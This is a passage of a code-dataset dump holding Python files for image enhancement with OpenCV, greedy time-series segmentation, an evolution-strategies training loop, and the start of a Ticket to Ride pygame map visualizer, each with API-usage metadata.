"matplotlib.pyplot.imshow", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}]} +{"seq_id": "538095827", "text": "from cv2 import cv2 as cv\nimport math\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport os\nimport re\n\nclass Image(object):\n def __init__(self, root):\n self.root = root\n self.data = cv.imread(root)\n \n def img_show(self, title, img, label=None):\n cv.imshow(title, img)\n cv.waitKey(0)\n cv.destroyWindow(title)\n\n file_name = re.search('/(.*)bmp', self.root).group().replace('/', '_').replace('bmp', 'png')\n cv.imwrite('outputs/' + label + file_name, img)\n\n def invert(self):\n if self.data is not None:\n new_data = 255 - self.data\n result = np.hstack((self.data, new_data))\n self.img_show(\"Inversion\", result, 'inverted')\n\n def log_trans(self, c):\n # s = c * log(1 + r)\n if self.data is not None: \n new_data = np.zeros_like(self.data)\n\n rows = self.data.shape[0]\n cols = self.data.shape[1]\n \n for i in range(rows):\n for j in range(cols):\n for k in range(3):\n new_data[i, j, k] = c * math.log(1.0 + self.data[i, j, k])\n\n cv.normalize(new_data, new_data, 0, 255, cv.NORM_MINMAX)\n new_data = cv.convertScaleAbs(new_data)\n\n result = np.hstack((self.data, new_data))\n\n self.img_show(\"Log_trans with c=\"+str(c), result, 'log-transfered')\n\n def exp_trans(self, c, gamma):\n # s = c * r ^ gamma\n if self.data is not None: \n new_data = np.zeros_like(self.data)\n\n rows = self.data.shape[0]\n cols = self.data.shape[1]\n \n for i in range(rows):\n for j in range(cols):\n for k in range(3):\n new_data[i, j, k] = c * math.pow(self.data[i, j, k], gamma)\n\n cv.normalize(new_data, new_data, 0, 255, cv.NORM_MINMAX)\n new_data = cv.convertScaleAbs(new_data)\n\n result = np.hstack((self.data, new_data))\n\n self.img_show(\"Exp_trans with c=\"+str(c)+\" gamma=\"+str(gamma), result, 'exp-transfered')\n \n def neighbor(self):\n data_3x3 = cv.blur(self.data, (3, 3))\n data_7x7 = cv.blur(self.data, (7, 7))\n result = np.hstack((self.data, data_3x3, data_7x7))\n self.img_show('neighbor averaging 3x3 and 7x7', result, 'neighbor-averaged')\n\n\n def median(self):\n data_3x3 = cv.medianBlur(self.data, 3)\n result = np.hstack((self.data, data_3x3))\n self.img_show(\"median averaging\", result, \"median-averaged\")\n\n def sharpen(self):\n new_data = cv.Laplacian(self.data, cv.CV_16S, ksize=3)\n new_data = cv.convertScaleAbs(new_data)\n result = np.hstack((self.data, new_data))\n self.img_show(\"sharpen\", result, 'sharpened')\n \n def hist_equalization(self):\n colors=('b', 'g', 'r')\n\n (b, g, r) = cv.split(self.data)\n\n plt.figure()\n b_e = cv.equalizeHist(b)\n g_e = cv.equalizeHist(g)\n r_e = cv.equalizeHist(r)\n\n plt.subplot(1, 2, 1)\n plt.plot(b[0], colors[0])\n plt.plot(g[0], colors[1])\n plt.plot(r[0], colors[2])\n\n plt.subplot(1, 2, 2)\n plt.plot(b_e[0], colors[0])\n plt.plot(g_e[0], colors[1])\n plt.plot(r_e[0], colors[2])\n \n file_name = re.search('/(.*)bmp', self.root).group().replace('/', '_').replace('bmp', 'png')\n plt.savefig('outputs/' + 'histogram-of-' + file_name)\n plt.show()\n \n src = cv.merge((b, g, r))\n dst = cv.merge((b_e, g_e, r_e))\n\n result = np.hstack((src, dst))\n self.img_show(\"Hist_equalization\", result, \"hist-equalized\")\n\n \nif __name__ == \"__main__\":\n imgs = []\n for file in os.listdir('img/'):\n imgs.append(Image('img/'+file))\n \n # imgs[15].invert()\n # imgs[6].log_trans(2)\n imgs[1].exp_trans(2, 2)\n imgs[1].exp_trans(2, 0.5)\n # imgs[13].neighbor()\n # imgs[4].median()\n # imgs[24].sharpen()\n imgs[25].hist_equalization()\n\n\n ", "sub_path": "imgEnhancement.py", "file_name": "imgEnhancement.py", "file_ext": "py", "file_size_in_byte": 4062, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.cv2.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 11, "usage_type": "name"}, {"api_name": "cv2.cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 14, "usage_type": "name"}, {"api_name": "cv2.cv2.waitKey", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 15, "usage_type": "name"}, {"api_name": "cv2.cv2.destroyWindow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 16, "usage_type": "name"}, {"api_name": "re.search", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cv2.imwrite", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 30, "usage_type": "call"}, {"api_name": "math.log", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.cv2.normalize", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 40, "usage_type": "name"}, {"api_name": "cv2.cv2.NORM_MINMAX", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.cv2.convertScaleAbs", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 50, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.cv2.normalize", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 60, "usage_type": "name"}, {"api_name": "cv2.cv2.NORM_MINMAX", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.cv2.convertScaleAbs", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.cv2.blur", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 68, "usage_type": "name"}, {"api_name": "cv2.cv2.blur", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.cv2.medianBlur", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.cv2.Laplacian", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 80, "usage_type": "name"}, {"api_name": "cv2.cv2.CV_16S", "line_number": 80, "usage_type": "attribute"}, {"api_name": "cv2.cv2.convertScaleAbs", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.cv2.split", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "cv2.cv2.equalizeHist", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 91, "usage_type": "name"}, {"api_name": "cv2.cv2.equalizeHist", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 92, "usage_type": "name"}, {"api_name": "cv2.cv2.equalizeHist", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "re.search", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "cv2.cv2.merge", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 109, "usage_type": "name"}, {"api_name": "cv2.cv2.merge", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.hstack", "line_number": 112, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "439398311", "text": "import numpy as np\nfrom itertools import combinations \n\ndef naive(x, k, sigma, criterion='gmse'):\n if criterion == 'gmse':\n return naive_gmse(x, k, sigma)\n elif criterion == 'minmax':\n return naive_minmax(x, k, sigma)\n else:\n print('criterion not match, should be gmse|minmax')\n return None\n\ndef naive_gmse(x, k, sigma):\n pivot_candidate = list(range(2, len(x)-1))\n min_error = 10E10\n best_pivot = list(range(0, k+1))\n\n for c in combinations(pivot_candidate, k):\n pivots = [0] + list(c) + [len(x)]\n case_error = 0\n # if 1 in list(np.array(c[1:]) - np.array(c[:-1])): continue\n \n case_error = sum([sigma[pivots[i], pivots[i+1]-1] for i in range(len(pivots)-1)])\n # print(c, case_error)\n if case_error < min_error:\n min_error = case_error\n best_pivot = c\n return list(best_pivot)\n\n\ndef naive_minmax(x, k, sigma):\n pivot_candidate = list(range(2, len(x)-1))\n min_error = 10E10\n best_pivot = list(range(0, k+1))\n\n for c in combinations(pivot_candidate, k):\n pivots = [0] + list(c) + [len(x)]\n # case_error = 0\n \n case_error = max([sigma[pivots[i], pivots[i+1]-1] for i in range(len(pivots)-1)])\n # print(c, case_error)\n if case_error < min_error:\n min_error = case_error\n best_pivot = c\n return list(best_pivot)\n\n\ndef bottom_up_k(x, k, sigma=None):\n segments = [x[i:i+2] for i in range(0, len(x), 2)]\n cost=[]\n for i in range(len(segments)-1):\n cost.append(regression_error(segments[i] + segments[i+1]))\n if cost == []:\n return segments\n # print('cost:', cost)\n while len(segments) > k+1:\n i = cost.index(min(cost))\n segments[i] = segments[i] + segments[i+1]\n del segments[i+1]\n del cost[i]\n if cost == []:\n break\n if i > 0: cost[i-1] = regression_error(segments[i-1]+segments[i])\n if i < len(segments)-1: cost[i] = regression_error(segments[i]+segments[i+1])\n seg_lens = np.array([len(p) for p in segments])\n pivots = seg_lens.cumsum()\n return pivots.tolist()[:-1]\n\ndef bottom_up(T, max_err):\n segments = [T[i:i+2] for i in range(0, len(T), 2)]\n cost = []\n for i in range(len(segments)-1):\n cost.append(regression_error(segments[i] + segments[i+1]))\n # print(cost)\n if cost == []:\n return segments\n while min(cost) < max_err:\n i = cost.index(min(cost))\n segments[i] = segments[i] + segments[i+1]\n del segments[i+1]\n del cost[i]\n if cost == []:\n break\n if i > 0: cost[i-1] = regression_error(segments[i-1]+segments[i])\n if i < len(segments)-1: cost[i] = regression_error(segments[i]+segments[i+1])\n return segments\n\ndef bottom_up_iter(x):\n segments = [x[i:i+2] for i in range(0, len(x), 2)]\n cost=[]\n for i in range(len(segments)-1):\n cost.append(regression_error(segments[i] + segments[i+1]))\n if cost == []:\n return segments\n\n while len(segments) > 1:\n i = cost.index(min(cost))\n segments[i] = segments[i] + segments[i+1]\n del segments[i+1]\n del cost[i]\n if cost == []:\n break\n if i > 0: cost[i-1] = regression_error(segments[i-1]+segments[i])\n if i < len(segments)-1: cost[i] = regression_error(segments[i]+segments[i+1])\n seg_lens = np.array([len(p) for p in segments])\n pivots = seg_lens.cumsum()[:-1].tolist()\n error = max_error(x, pivots)\n yield error, pivots\n \n # return pivots.tolist()[:-1]\n\ndef top_down(T, max_err):\n # if len(T) < 4:\n # return [T]\n if regression_error(T) > max_err:\n best_so_far = float('inf')\n for i in range(1, len(T)-1):\n err = large_mse(T[:i], T[i:])\n if err < best_so_far:\n break_point = i\n best_so_far = err\n if 'i' not in locals():\n return [T]\n # return [T[:break_point], T[break_point:]]\n segments = []\n segments.extend(top_down(T[:break_point], max_err))\n segments.extend(top_down(T[break_point:], max_err))\n return segments\n else:\n return [T]\n\ndef top_down_k(T, k, max_err=0):\n def filter_seg(segs):\n pass\n def get_best_pivot(t, begin_point):\n best_error = float('inf')\n best_pivot = 1\n for i in range(1, len(t)-1):\n err = large_mse(t[:i], t[i:])\n if err < best_error:\n best_pivot = i\n best_error = err\n return best_pivot + begin_point\n def seg_by_layer(segs, pvts):\n begins = [0] + pvts\n \n pvts = []\n visited_k = []\n if regression_error(T) < max_err: return []\n\n return pvts\n\ndef create_tdtree(T, max_err, begin_point=0, depth=0):\n '''\n create_tdtree(T, max_err, begin_point=0, depth=0)\n create top down tree with dictionary-based tree structure\n '''\n if regression_error(T) > max_err:\n pivots = {}\n best_so_far = float('inf')\n for i in range(1, len(T)-1):\n err = large_mse(T[:i], T[i:])\n if err < best_so_far:\n break_point = i\n best_so_far = err\n if 'i' not in locals():\n return {}\n left = create_tdtree(T[:break_point], max_err, begin_point, depth=depth+1)\n right = create_tdtree(T[break_point:], max_err, begin_point+break_point, depth=depth+1)\n \n lerr = regression_error(T[:break_point])\n rerr = regression_error(T[break_point:])\n pivots['pvt'] = begin_point+break_point\n pivots['err'] = regression_error(T)\n pivots['lerr'] = lerr\n pivots['rerr'] = rerr\n pivots['depth'] = depth\n if left != {} : pivots['left'] = left\n if right != {}: pivots['right'] = right\n return pivots\n else:\n return {}\n\ndef traverse_by_l2r(node, flatten_nodes):\n # print(node)\n depth = node['depth']\n if len(flatten_nodes) < depth + 1:\n flatten_nodes.append([])\n\n nd = { k: node[k] for k in ['pvt', 'lerr', 'rerr', 'err', 'depth'] }\n flatten_nodes[depth].append(nd)\n if 'left' in node:\n traverse(node['left'], flatten_nodes)\n if 'right' in node:\n traverse(node['right'], flatten_nodes)\n return flatten_nodes\n\n\ndef traverse_by_errs(node, flatten_nodes):\n # print(node)\n depth = node['depth']\n if len(flatten_nodes) < depth + 1:\n flatten_nodes.append([])\n\n nd = { k: node[k] for k in ['pvt', 'lerr', 'rerr', 'err', 'depth'] }\n flatten_nodes[depth].append(nd)\n if 'left' in node:\n traverse(node['left'], flatten_nodes)\n if 'right' in node:\n traverse(node['right'], flatten_nodes)\n return flatten_nodes\n\ntraverse = traverse_by_l2r\ntraverse = traverse_by_errs\n\ndef mse(y, y_bar):\n if len(y) < 2:\n return 0.0\n s = 0.0\n for i in range(len(y)):\n s += (y[i] - y_bar[i])**2\n # err = (s**.5)/len(y)\n err = s/len(y)\n return err\n\ndef regression(y):\n if len(y) == 0: return []\n if len(y) == 1: return y\n x = list(range(1,len(y)+1))\n fit = np.polyfit(x, y, 1)\n regr = np.poly1d(fit)\n r = regr(x)\n return r\n\ndef regression_error(T):\n r = regression(T)\n err = mse(T, r)\n return err\n\ndef max_error(t, pivots):\n pivots = [0] + list(pivots) + [len(t)]\n return max([regression_error(t[pivots[i]:pivots[i+1]]) for i in range(len(pivots)-1)])\n\ndef seg_errors(t, pivots):\n pivots = [0] + pivots + [len(t)]\n return[regression_error(t[pivots[i]:pivots[i+1]]) for i in range(len(pivots)-1)]\n\ndef large_mse(seg1, seg2):\n return max(regression_error(seg1), regression_error(seg2))\n", "sub_path": "tsseg/greed.py", "file_name": "greed.py", "file_ext": "py", "file_size_in_byte": 7734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "itertools.combinations", "line_number": 18, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.poly1d", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "292896396", "text": "#!/usr/bin/python\r\n\r\n# Libraries to be imported\r\nimport gym\r\nfrom gym import spaces\r\nimport numpy as np\r\nfrom numpy import floor, log, eye, zeros, array, sqrt, sum, dot, tile, outer, real\r\nfrom numpy import exp, diag, power, ravel\r\nfrom numpy.linalg import eig, norm\r\nfrom numpy.random import randn\r\nimport math\r\nimport random\r\nimport time\r\nfrom scipy import zeros, ones\r\nfrom scipy.linalg import expm\r\nimport configparser\r\nimport sys\r\nimport os\r\nfrom six import integer_types\r\nimport struct\r\nimport net\r\nfrom policy import ErPolicy, GymPolicy\r\nfrom evoalgo import EvoAlgo\r\nfrom utils import ascendent_sort\r\n\r\n# Evolve with ES algorithm taken from Salimans et al. (2017)\r\nclass Salimans(EvoAlgo):\r\n def __init__(self, env, policy, seed, filedir):\r\n EvoAlgo.__init__(self, env, policy, seed, filedir)\r\n\r\n def run(self, maxsteps):\r\n\r\n start_time = time.time()\r\n\r\n # initialize the solution center\r\n self.center = self.policy.get_trainable_flat()\r\n \r\n # Extract the number of parameters\r\n nparams = self.policy.nparams\r\n # setting parameters\r\n if self.batchSize == 0:\r\n # 4 + floor(3 * log(N))\r\n self.batchSize = int(4 + math.floor(3 * math.log(nparams)))\r\n # Symmetric weights in the range [-0.5,0.5]\r\n weights = zeros(self.batchSize)\r\n\r\n ceval = 0 # current evaluation\r\n cgen = 0 # current generation\r\n # Parameters for Adam policy\r\n m = zeros(nparams)\r\n v = zeros(nparams)\r\n epsilon = 1e-08 # To avoid numerical issues with division by zero...\r\n beta1 = 0.9\r\n beta2 = 0.999\r\n \r\n # RandomState for perturbing the performed actions (used only for samples, not for centroid)\r\n np.random.seed(self.seed)\r\n\r\n print(\"Salimans: seed %d maxmsteps %d batchSize %d stepsize %lf noiseStdDev %lf wdecay %d sameEnvCond %d nparams %d\" % (self.seed, maxsteps / 1000000, self.batchSize, self.stepsize, self.noiseStdDev, self.wdecay, self.sameenvcond, nparams))\r\n\r\n # Set evolution mode\r\n self.policy.runEvo()\r\n\r\n # main loop\r\n elapsed = 0\r\n while ceval < maxsteps:\r\n cgen += 1\r\n\r\n # Extract half samples from Gaussian distribution with mean 0.0 and standard deviation 1.0\r\n samples = np.random.randn(self.batchSize, nparams)\r\n # We generate simmetric variations for the offspring\r\n symmSamples = zeros((self.batchSize * 2, nparams))\r\n for i in range(self.batchSize):\r\n sampleIdx = 2 * i\r\n for g in range(nparams):\r\n symmSamples[sampleIdx,g] = samples[i,g]\r\n symmSamples[sampleIdx + 1,g] = -samples[i,g]\r\n # Generate offspring\r\n offspring = tile(self.center.reshape(1, nparams), (self.batchSize * 2, 1)) + self.noiseStdDev * symmSamples\r\n # Evaluate offspring\r\n fitness = zeros(self.batchSize * 2)\r\n # If normalize=1 we update the normalization vectors\r\n if self.policy.normalize == 1:\r\n self.policy.nn.updateNormalizationVectors()\r\n # Reset environmental seed every generation\r\n self.policy.setSeed(self.policy.get_seed + cgen)\r\n # Set generalization flag to False\r\n self.policy.doGeneralization(False)\r\n # Evaluate offspring\r\n for k in range(self.batchSize * 2):\r\n # Set policy parameters (corresponding to the current offspring)\r\n self.policy.set_trainable_flat(offspring[k])\r\n # Sample of the same generation experience the same environmental conditions\r\n if self.sameenvcond == 1:\r\n self.policy.setSeed(self.policy.get_seed + cgen)\r\n # Evaluate the offspring\r\n eval_rews, eval_length = self.policy.rollout(timestep_limit=1000)\r\n # Get the fitness\r\n fitness[k] = eval_rews\r\n # Update the number of evaluations\r\n ceval += eval_length\r\n # Update data if the current offspring is better than current best\r\n self.updateBest(fitness[k], offspring[k])\r\n\r\n # Sort by fitness and compute weighted mean into center\r\n fitness, index = ascendent_sort(fitness)\r\n # Now me must compute the symmetric weights in the range [-0.5,0.5]\r\n utilities = zeros(self.batchSize * 2)\r\n for i in range(self.batchSize * 2):\r\n utilities[index[i]] = i\r\n utilities /= (self.batchSize * 2 - 1)\r\n utilities -= 0.5\r\n # Now we assign the weights to the samples\r\n for i in range(self.batchSize):\r\n idx = 2 * i\r\n weights[i] = (utilities[idx] - utilities[idx + 1]) # pos - neg\r\n\r\n # Compute the gradient\r\n g = 0.0\r\n i = 0\r\n while i < self.batchSize:\r\n gsize = -1\r\n if self.batchSize - i < 500:\r\n gsize = self.batchSize - i\r\n else:\r\n gsize = 500\r\n g += dot(weights[i:i + gsize], samples[i:i + gsize,:]) # weights * samples\r\n i += gsize\r\n # Normalization over the number of samples\r\n g /= (self.batchSize * 2)\r\n # Weight decay\r\n if (self.wdecay == 1):\r\n globalg = -g + 0.005 * self.center\r\n else:\r\n globalg = -g\r\n # ADAM policy\r\n # Compute how much the center moves\r\n a = self.stepsize * sqrt(1.0 - beta2 ** cgen) / (1.0 - beta1 ** cgen)\r\n m = beta1 * m + (1.0 - beta1) * globalg\r\n v = beta2 * v + (1.0 - beta2) * (globalg * globalg)\r\n dCenter = -a * m / (sqrt(v) + epsilon)\r\n # update center\r\n self.center += dCenter\r\n\r\n centroidfit = -999999999.0\r\n if self.evalCenter != 0:\r\n # Evaluate the centroid\r\n self.policy.set_trainable_flat(self.center)\r\n if self.sameenvcond == 1:\r\n self.policy.setSeed(self.policy.get_seed + cgen)\r\n eval_rews, eval_length = self.policy.rollout(timestep_limit=1000)\r\n centroidfit = eval_rews\r\n ceval += eval_length\r\n # Update data if the centroid is better than current best\r\n self.updateBest(centroidfit, self.center)\r\n\r\n # Now perform generalization\r\n if self.policy.generalize:\r\n candidate = None\r\n if centroidfit > fitness[self.batchSize * 2 - 1]:\r\n # Centroid undergoes generalization test\r\n candidate = np.copy(self.center)\r\n else:\r\n # Best sample undergoes generalization test\r\n bestsamid = index[self.batchSize * 2 - 1]\r\n candidate = np.copy(offspring[bestsamid])\r\n # Set the seed\r\n self.policy.set_trainable_flat(candidate) # Parameters must be updated by the algorithm!!\r\n self.policy.setSeed(self.policy.get_seed + 1000000)\r\n self.policy.doGeneralization(True)\r\n eval_rews, eval_length = self.policy.rollout(timestep_limit=1000)\r\n gfit = eval_rews\r\n ceval += eval_length\r\n # Update data if the candidate is better than current best generalizing individual\r\n self.updateBestg(gfit, candidate)\r\n\r\n # Compute the elapsed time (i.e., how much time the generation lasted)\r\n elapsed = (time.time() - start_time)\r\n\r\n # Update information\r\n self.updateInfo(cgen, ceval, fitness, self.center, centroidfit, fitness[self.batchSize * 2 - 1], elapsed, maxsteps)\r\n\r\n # save data\r\n self.save(cgen, ceval, centroidfit, self.center, fitness[self.batchSize * 2 - 1], (time.time() - start_time))\r\n\r\n # print simulation time\r\n end_time = time.time()\r\n print('Simulation time: %dm%ds ' % (divmod(end_time - start_time, 60)))\r\n\r\n", "sub_path": "salimans.py", "file_name": "salimans.py", "file_ext": "py", "file_size_in_byte": 8235, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "evoalgo.EvoAlgo", "line_number": 27, "usage_type": "name"}, {"api_name": "evoalgo.EvoAlgo.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "evoalgo.EvoAlgo", "line_number": 29, "usage_type": "name"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 43, "usage_type": "call"}, {"api_name": "math.log", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "scipy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 79, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.ascendent_sort", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 166, "usage_type": "call"}, {"api_name": "time.time", "line_number": 178, "usage_type": "call"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "95797763", "text": "import ttr_info as info\r\nimport ttr_classes as ttr\r\nimport pygame\r\n\r\ngame_map = ttr.Map(info.city_map,info.possible_tickets)\r\n\r\n# Define some colors\r\nred = (255,0,0)\r\ngreen = (0,255,0)\r\nblue = (0,0,255)\r\ndarkBlue = (0,0,128)\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\npink = (255,200,200)\r\ncolor_list = [red,green,blue,darkBlue,white,black,pink]\r\nheight = width = 19\r\nmargin = 6\r\nthickness = 1\r\nrect_color = black\r\nnum_pressed = 0\r\nx_scale = 18\r\ny_scale = 18\r\nnum_rows = 28\r\nnum_cols = 54\r\n\r\npygame.init()\r\n\r\n# Set the width and height of the screen [width, height]\r\nsize = (1700,706)\r\nscreen = pygame.display.set_mode(size)\r\n\r\npygame.display.set_caption(\"Ticket To Ride Visualization\")\r\n\r\n# Loop until the user clicks the close button.\r\ndone = False\r\n\r\n# Used to manage how fast the screen updates\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndef get_cities():\r\n cities = set()\r\n for city in game_map.nodes:\r\n cities.add(game_map.nodes[city].pixel)\r\n return cities\r\n\r\ndef get_roads():\r\n roads = []\r\n for city in game_map.city_map:\r\n start_x = width*game_map.nodes[city].pixel[0] + margin*(game_map.nodes[city].pixel[0]+1) + width/2\r\n start_y = height*game_map.nodes[city].pixel[1] + margin*(game_map.nodes[city].pixel[1]+1) + height/2\r\n for dest in game_map.city_map[city]:\r\n end_x = width*game_map.nodes[dest].pixel[0] + margin*(game_map.nodes[dest].pixel[0]+1) + width/2\r\n end_y = height*game_map.nodes[dest].pixel[1] + + margin*(game_map.nodes[dest].pixel[1]+1) + height/2\r\n roads.append([(start_x,start_y),(end_x,end_y)])\r\n return roads\r\n\r\ndef draw_roads(added_lines):\r\n for i in get_roads():\r\n pygame.draw.lines(screen, black, False, i, 3) \r\n\r\n for i in added_lines:\r\n if type(i) == list:\r\n pygame.draw.lines(screen, green, False, i, 3)\r\n\r\ndef better_map():\r\n cities = get_cities()\r\n for col in range(num_cols):\r\n for row in range(num_rows):\r\n pygame.draw.rect(screen,black,(width*col+margin*(col+1),height*row+margin*(row+1),width,height),thickness)\r\n\r\n for city in game_map.nodes:\r\n x = game_map.nodes[city].pixel[0]\r\n y = game_map.nodes[city].pixel[1]\r\n pygame.draw.rect(screen,red,(width*x+margin*(x+1),height*y+margin*(y+1),width,height),0)\r\n fontObj = pygame.font.Font('freesansbold.ttf', height-1)\r\n textSurfaceObj = fontObj.render(city, True, white, black)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (width*(x+1)+margin*(x+1),height*y+margin*(y+1))\r\n screen.blit(textSurfaceObj, textRectObj)\r\n\r\ndef check_mouse(pos):\r\n for city in game_map.nodes:\r\n x = game_map.nodes[city].pixel[0]\r\n y = game_map.nodes[city].pixel[1]\r\n if ((pos[0] - (width*x+margin*(x+1)))**2 + (pos[1] - (height*y+margin*(y+1)))**2)**0.5 < 20:\r\n pygame.draw.rect(screen,green,(width*x+margin*(x+1),height*y+margin*(y+1),width,height),0)\r\n fontObj = pygame.font.Font('freesansbold.ttf', height-1)\r\n textSurfaceObj = fontObj.render(city, True, black, white)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (width*(x+1)+margin*(x+1),height*y+margin*(y+1))\r\n screen.blit(textSurfaceObj, textRectObj)\r\n return city\r\n return False\r\n\r\ndef use_road(current_road):\r\n start = current_road[0]\r\n end = current_road[1]\r\n\r\n if end in game_map.nodes[start].adj_list:\r\n game_map.remove_edge((start,end))\r\n start_x = 